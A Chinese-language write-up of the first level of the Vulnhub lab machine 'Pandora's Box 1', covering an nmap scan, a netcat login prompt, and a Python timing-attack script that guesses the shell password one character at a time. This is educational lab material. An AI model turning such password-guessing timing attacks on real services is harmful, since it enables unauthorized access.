tick.Tack

Pandora’s Box 1 - Level 1

Pandora’s Box 1,還是Vulnhub的Vulnerable Machine,作者是c0ne

先用nmap掃描目標,除了port 22的ssh之外,port 54311上也有執行程式

Starting Nmap 6.46 ( http://nmap.org ) at 2015-01-03 00:35 EST
Nmap scan report for 192.168.2.158
Host is up (0.00019s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol
2.0)
54311/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version,
please submit the following fingerprint at http://www.insecure.org/cgi-bin/servi
cefp-submit.cgi :
SF-Port54311-TCP:V=6.46%I=7%D=1/3%Time=54A77FA8%P=x86_64-unknown-linux-gnu
SF:%r(NULL,69,"#######################\n#\x20Secure\x20Remote\x20Shell\x20
SF:#\n#######################\nWelcome,\x20please\x20log\x20in\nPassword:\
SF:x20")%r(GenericLines,73,"#######################\n#\x20Secure\x20Remote
SF:\x20Shell\x20#\n#######################\nWelcome,\x20please\x20log\x20i
SF:n\nPassword:\x20Password:\x20")%r(GetRequest,85,"######################
SF:#\n#\x20Secure\x20Remote\x20Shell\x20#\n#######################\nWelcom
SF:e,\x20please\x20log\x20in\nPassword:\x20Invalid\x20password!\nPassword:
SF:\x20")%r(HTTPOptions,85,"#######################\n#\x20Secure\x20Remote
SF:\x20Shell\x20#\n#######################\nWelcome,\x20please\x20log\x20i
SF:n\nPassword:\x20Invalid\x20password!\nPassword:\x20")%r(RTSPRequest,85,
SF:"#######################\n#\x20Secure\x20Remote\x20Shell\x20#\n########
SF:###############\nWelcome,\x20please\x20log\x20in\nPassword:\x20Invalid\
SF:x20password!\nPassword:\x20")%r(RPCCheck,85,"#######################\n#
SF:\x20Secure\x20Remote\x20Shell\x20#\n#######################\nWelcome,\x
SF:20please\x20log\x20in\nPassword:\x20Invalid\x20password!\nPassword:\x20
SF:")%r(DNSVersionBindReq,73,"#######################\n#\x20Secure\x20Remo
SF:te\x20Shell\x20#\n#######################\nWelcome,\x20please\x20log\x2
SF:0in\nPassword:\x20Password:\x20")%r(DNSStatusRequest,73,"##############
SF:#########\n#\x20Secure\x20Remote\x20Shell\x20#\n#######################
SF:\nWelcome,\x20please\x20log\x20in\nPassword:\x20Password:\x20")%r(Help,
SF:85,"#######################\n#\x20Secure\x20Remote\x20Shell\x20#\n#####
SF:##################\nWelcome,\x20please\x20log\x20in\nPassword:\x20Inval
SF:id\x20password!\nPassword:\x20")%r(SSLSessionReq,A1,"##################
SF:#####\n#\x20Secure\x20Remote\x20Shell\x20#\n#######################\nWe
SF:lcome,\x20please\x20log\x20in\nPassword:\x20Invalid\x20password!\nPassw
SF:ord:\x20Invalid\x20password!\nPassword:\x20")%r(Kerberos,8F,"##########
SF:#############\n#\x20Secure\x20Remote\x20Shell\x20#\n###################
SF:####\nWelcome,\x20please\x20log\x20in\nPassword:\x20Password:\x20Invali
SF:d\x20password!\nPassword:\x20");
MAC Address: 00:0C:29:35:8B:92 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at http://nmap.
org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.78 seconds

連上54311後會看到要求輸入密碼

root@kali:~/_Sec/vulnhub/pandora# nc 192.168.2.158 54311
#######################
# Secure Remote Shell #
#######################
Welcome, please log in
Password:

盲目地試過一些弱密碼,也用了Kali Linux內建的rockyou.txt跑了一陣子都沒有效果

在嘗試Buffer overflow時,發現密碼的長度在超過64個字之後,會回傳兩次的錯誤訊息

而且還有一件更有趣的事情:每次送出密碼到回傳訊息之間的間隔時間似乎不太一樣

這個看起來說不定能用跑起來非常帥氣的Timing Attack來解

先寫一段簡單的code來跑看看每一個字元的花費時間

#!/usr/bin/python

    import string
    import time
    from socket import *
    readable=string.ascii_letters+string.digits+string.punctuation
    s=socket(AF_INET, SOCK_STREAM)
    s.connect(('192.168.2.158', 54311))
    data=s.recv(1024)
    print (data)
    data=s.recv(1024)
    print (data)
    MAX_RUN=6
    SendTime={}
    for i in readable:
        SendTime [i]=0.0

    for count in range(0,MAX_RUN):
        for i in readable:
            s.send(i+'\n')
            start=time.time()
            data=s.recv(1024)
            SendTime[i]=time.time() - start
                
    curMin=999.0
    curMinChar='-'
    for x,y in SendTime.iteritems():
        avg=(y/MAX_RUN)
        if (avg < curMin):
            curMin=avg
            curMinChar=x
    print curMinChar + ": " + str(curMin)

多跑個幾次之後,會發現每次出來的結果都是R的時間最短

R: 0.000167489051819
R: 0.000175515810649
R: 0.000179370244344
R: 0.000188191731771

再來就把程式碼升級,讓猜測密碼的過程可以很帥氣地表現

(這篇打完之後跑去看別人的writeup,發現了asciinema這個好物,馬上套用XD)

進去後發現總共有五個level,而level2看來需要逆向工程一下,下次開新的一篇來寫